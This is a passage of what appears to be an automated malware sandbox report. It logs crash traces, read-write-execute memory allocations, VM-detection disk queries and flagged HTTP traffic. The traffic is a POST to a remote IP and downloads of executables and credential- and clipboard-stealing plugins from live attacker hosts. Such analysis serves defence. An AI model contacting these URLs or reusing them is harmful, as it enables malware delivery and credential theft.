RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925344 registers.edi: 3925644 registers.eax: 0 registers.ebp: 3925656 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28acc8a 0x28ac631 0x28a7145 0x28a5de4 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925632 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925640 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 49100020	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ad0fc 0x28acf19 0x28a712d 0x28a5eea 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925376 registers.edi: 3925676 registers.eax: 0 registers.ebp: 3925688 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28ad4bc 0x28acf19 0x28a712d 0x28a5eea 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925664 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925672 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 46532156	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ad0fc 0x28acf19 0x28a7145 0x28a5eea 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925376 registers.edi: 3925676 registers.eax: 0 registers.ebp: 3925688 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28ad4bc 0x28acf19 0x28a7145 0x28a5eea 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925664 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925672 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 48025248	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ad0fc 0x28acf19 0x28a7145 0x28a5eea 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925376 registers.edi: 3925676 registers.eax: 0 registers.ebp: 3925688 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 0	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.68.3/home/love/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/new/foto135.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/new/fotod25.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/anon/an.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.3/home/love/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.3/home/love/Plugins/clip64.dll

Performs some HTTP requests (6 events)

request	POST http://77.91.68.3/home/love/index.php
request	GET http://77.91.124.31/new/foto135.exe
request	GET http://77.91.124.31/new/fotod25.exe
request	GET http://77.91.124.31/anon/an.exe
request	GET http://77.91.68.3/home/love/Plugins/cred64.dll
request	GET http://77.91.68.3/home/love/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://77.91.68.3/home/love/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 437 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 24, 2023, 7:34 a.m.	process_identifier: 2584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:34 a.m.	process_identifier: 2584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73261000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:34 a.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:34 a.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:34 a.m.	process_identifier: 2716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:34 a.m.	process_identifier: 2716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73261000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4ee3000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3faa000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef38c5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3911000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3fab000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000cf0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3912000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3914000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3914000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3914000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3914000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9419a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9424c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94276000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94250000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe941ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2256000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefeffd000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe941bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe941ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe941bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe941aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 24, 2023, 7:27 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (14 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
